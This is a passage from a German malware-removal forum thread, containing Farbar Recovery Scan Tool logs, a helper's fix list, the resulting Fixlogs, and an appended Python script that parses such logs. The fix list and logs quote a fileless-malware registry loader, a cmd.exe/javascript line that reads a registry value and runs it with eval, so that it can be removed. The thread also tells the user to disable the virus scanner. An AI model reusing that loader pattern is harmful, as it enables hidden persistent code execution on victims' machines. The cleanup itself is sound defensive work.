  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-07-28 18:15:02.562
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-07-05 21:28:31.069
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-20 13:12:31.840
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-06 20:55:49.642
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-20 20:43:22.953
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-20 20:06:11.606
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-19 20:40:43.841
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-19 20:18:44.959
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-5820K CPU @ 3.30GHz
Prozentuale Nutzung des RAM: 19%
Installierter physikalischer RAM: 16279.21 MB
Verfügbarer physikalischer RAM: 13118.89 MB
Summe virtueller Speicher: 18711.21 MB
Verfügbarer virtueller Speicher: 14960.39 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.69 GB) (Free:75.21 GB) NTFS
Drive f: (Volume) (Fixed) (Total:3725.96 GB) (Free:3665.1 GB) NTFS
Drive g: (Volume) (Fixed) (Total:3725.96 GB) (Free:2787.59 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: BE291492)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=449 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7452 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt ============================
         

09.08.2017, 22:07   #29
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 



FRST-Fix

Please disable your virus scanner completely now, to make sure the fix runs through cleanly!


Please press the Windows key + R and type notepad into the Run window.

Now copy the following text from the code box into the empty text document

Code:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\Program Files (x86)\IObit
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://search.avira.net/#web/result?source=art&q=
FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01]
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
emptytemp:
         

Please save this as Fixlist.txt on your desktop (or in the directory where FRST is located).
  • Now start FRST again and click the "Entfernen" button.
  • The tool creates a Fixlog.txt.
  • Post its contents for me.

__________________
Please always post log files in CODE tags

10.08.2017, 17:13   #30
Lost_Viking
 



Hmm, the program was killed prematurely by Windows.
I'll try it again right away.


Edit: Hmm, since the latest update I can no longer turn off Windows Defender... interesting... maybe that is why the operation was aborted.


Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-08-2017
durchgeführt von Martin333 (10-08-2017 17:45:04) Run:1
Gestartet von C:\Users\Martin ***\Desktop
Geladene Profile: Martin *** (Verfügbare Profile: Martin**)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\Program Files (x86)\IObit
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://search.avira.net/#web/result?source=art&q=
FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01]
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
emptytemp:
         
*****************

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => Schlüssel erfolgreich entfernt
"C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG" => nicht gefunden.
C:\Program Files (x86)\IObit => erfolgreich verschoben
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com => nicht gefunden.
HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.0 => Schlüssel erfolgreich entfernt
HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.1 => Schlüssel erfolgreich entfernt
RegLink Found. Source: "" => Target: "HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\ => Schlüssel erfolgreich entfernt
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas => Schlüssel nicht gefunden. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{057EAF51-6043-4A2C-8C62-FA5066DFA7DE} => Schlüssel konnte nicht entfernt werden. Zugriff verweigert.
         
OK, problem solved. Apparently Windows Defender needed a restart. I was able to turn it off afterwards.

Here is the rest of the log:
Code:
Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 10-08-2017 18:07:14)


Ergebnis der geplanten Schlüssel-Entfernung nach dem Neustart:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{057EAF51-6043-4A2C-8C62-FA5066DFA7DE} => Schlüssel erfolgreich entfernt

==== Ende vom Fixlog 18:07:14 ====
         
Here is the log after successful application and restart:

Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-08-2017
durchgeführt von Martin **** (10-08-2017 18:09:56) Run:2
Gestartet von C:\Users\Martin**\Desktop
Geladene Profile: Martin****(Verfügbare Profile: Martin 33)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\Program Files (x86)\IObit
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://search.avira.net/#web/result?source=art&q=
FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01]
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
emptytemp:
         
*****************

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => Schlüssel konnte nicht entfernt werden, Schlüssel könnte geschützt sein
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => Schlüssel nicht gefunden. 
"C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG" => nicht gefunden.
"C:\Program Files (x86)\IObit" => nicht gefunden.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com => nicht gefunden.
HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.0 => Schlüssel nicht gefunden. 
HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.1 => Schlüssel nicht gefunden. 
RegLink Found. Source: "" => Target: "HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\ => Schlüssel erfolgreich entfernt
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas => Schlüssel nicht gefunden. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{057EAF51-6043-4A2C-8C62-FA5066DFA7DE} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{189B4981-5161-4573-95FB-914ABF5857A2} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{189B4981-5161-4573-95FB-914ABF5857A2} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C71CB98-75B2-4838-9B99-8BB2257CEC5B} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C71CB98-75B2-4838-9B99-8BB2257CEC5B} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{41006DFD-D327-4048-9208-BB616205BF64} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{41006DFD-D327-4048-9208-BB616205BF64} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{43681C05-5E15-43E2-93BB-8585D47F91E4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{43681C05-5E15-43E2-93BB-8585D47F91E4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{54193568-FA18-42AA-AA36-72AE0A69F1CE} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{54193568-FA18-42AA-AA36-72AE0A69F1CE} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{749258DE-50AA-45E3-A106-4D57EA1939D4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{749258DE-50AA-45E3-A106-4D57EA1939D4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{DB66428E-B85F-4EDD-BC33-43CAA577BBCA} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DB66428E-B85F-4EDD-BC33-43CAA577BBCA} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FDC309C3-7CAB-43AD-8822-78E3C63B88B4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FDC309C3-7CAB-43AD-8822-78E3C63B88B4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => Schlüssel erfolgreich entfernt

=========== EmptyTemp: ==========

BITS transfer queue => 7888896 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 15107038 B
Java, Flash, Steam htmlcache => 682660468 B
Windows/system/drivers => 49826 B
Edge => 1498 B
Chrome => 26815042 B
Firefox => 4030740 B
Opera => 119808 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 0 B
NetworkService => 4440 B
Martin Walser => 33398127 B

RecycleBin => 11136170 B
EmptyTemp: => 745 MB temporäre Dateien entfernt.

================================

Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 10-08-2017 18:11:25)


Ergebnis der geplanten Schlüssel-Entfernung nach dem Neustart:

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => Schlüssel erfolgreich entfernt

==== Ende vom Fixlog 18:11:26 ====
         

Edited by Lost_Viking (10.08.2017 at 16:59)
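The two runs above differ in whether every fixlist entry actually produced a result line. The following is an added example, not part of the original posts and not FRST's own code: it compares the Task entries echoed under "fixlist Inhalt" with the result lines and reports which tasks were fully handled. The function names are hypothetical, the sample logs are constructed from lines in this thread, and the rule that a finished task shows both a TaskCache\Tasks\{GUID} line and a TaskCache\Tree\<path> line is an assumption read off the second run, not documented tool behaviour.

```python
import re

TASK_RE = re.compile(r"^Task: (\{[0-9A-Fa-f-]{36}\}) - (\\.+?) -> ")
STARS_RE = re.compile(r"^\*{5,}$")
END_RE = re.compile(r"^==== Ende vom Fixlog")

# Verdict phrases as they appear in the German Fixlogs posted in this thread.
OUTCOMES = [
    ("konnte nicht entfernt werden", "failed"),
    ("nicht gefunden", "not_found"),
    ("erfolgreich", "ok"),
]

def parse_fixlog(text):
    """Return (tasks from the echoed fixlist, last verdict per target, end marker seen)."""
    tasks, verdicts, stars, ended = {}, {}, 0, False
    for raw in text.splitlines():
        line = raw.strip()
        if STARS_RE.match(line):
            stars += 1
        elif END_RE.match(line):
            ended = True
        elif stars == 1:                      # between the two star lines: fixlist echo
            m = TASK_RE.match(line)
            if m:
                tasks[m.group(1).upper()] = m.group(2)
        elif stars >= 2 and " => " in line:   # result section, incl. post-reboot part
            target, _, verdict = line.partition(" => ")
            for phrase, label in OUTCOMES:
                if phrase in verdict:
                    verdicts[target.strip('"')] = label   # a later line overrides
                    break
    return tasks, verdicts, ended

def triage(text):
    """Classify every Task entry of the fixlist as done, partial, failed or no_result."""
    tasks, verdicts, ended = parse_fixlog(text)
    report = {}
    for guid, path in tasks.items():
        hits = {t: v for t, v in verdicts.items()
                if guid in t.upper() or t.endswith("\\TaskCache\\Tree" + path)}
        has_tasks_key = any("\\TaskCache\\Tasks\\" in t for t in hits)
        has_tree_key = any("\\TaskCache\\Tree\\" in t for t in hits)
        if not hits:
            report[guid] = "no_result"        # tool stopped before reaching this entry
        elif "failed" in hits.values():
            report[guid] = "failed"           # e.g. "Zugriff verweigert"
        elif has_tasks_key and has_tree_key:
            report[guid] = "done"
        else:
            report[guid] = "partial"          # only some of the task's keys were handled
    rerun = (not ended) or any(s != "done" for s in report.values())
    return {"ended": ended, "tasks": report, "rerun_needed": rerun}

# Constructed samples: lines taken from the logs in this thread, shortened to two tasks.
KEY = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\"
G1, P1 = "{057EAF51-6043-4A2C-8C62-FA5066DFA7DE}", "\\Microsoft\\Windows\\Setup\\GWXTriggers\\MachineUnlock-5d"
G2, P2 = "{189B4981-5161-4573-95FB-914ABF5857A2}", "\\Microsoft\\Windows\\Setup\\GWXTriggers\\OutOfIdle-5d"
FIXLIST = "\n".join([
    "fixlist Inhalt:", "*****************",
    f"Task: {G1} - {P1} -> Keine Datei <==== ACHTUNG",
    f"Task: {G2} - {P2} -> Keine Datei <==== ACHTUNG",
    "emptytemp:", "*****************", ""])

# Run 1: cut off after the first task key, no end marker.
RUN1 = FIXLIST + f"{KEY}Plain\\{G1} => Schlüssel konnte nicht entfernt werden. Zugriff verweigert.\n"
# Post-reboot remainder of run 1, as posted separately in the thread.
REBOOT = ("Ergebnis der geplanten Schlüssel-Entfernung nach dem Neustart:\n"
          f"{KEY}Plain\\{G1} => Schlüssel erfolgreich entfernt\n"
          "==== Ende vom Fixlog 18:07:14 ====\n")
# Run 2: every key of both tasks has a result line and the log is closed.
RUN2 = FIXLIST + "\n".join(
    f"{KEY}{sub} => Schlüssel erfolgreich entfernt"
    for sub in (f"Plain\\{G1}", f"Tasks\\{G1}", "Tree" + P1,
                f"Plain\\{G2}", f"Tasks\\{G2}", "Tree" + P2)
) + "\n==== Ende vom Fixlog 18:11:26 ====\n"

if __name__ == "__main__":
    for name, log in (("run 1", RUN1), ("run 1 + reboot", RUN1 + REBOOT), ("run 2", RUN2)):
        print(name, triage(log))
```

An end marker alone is not proof of a complete fix: the post-reboot remainder of run 1 closes the log, yet most tasks still have no result line.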
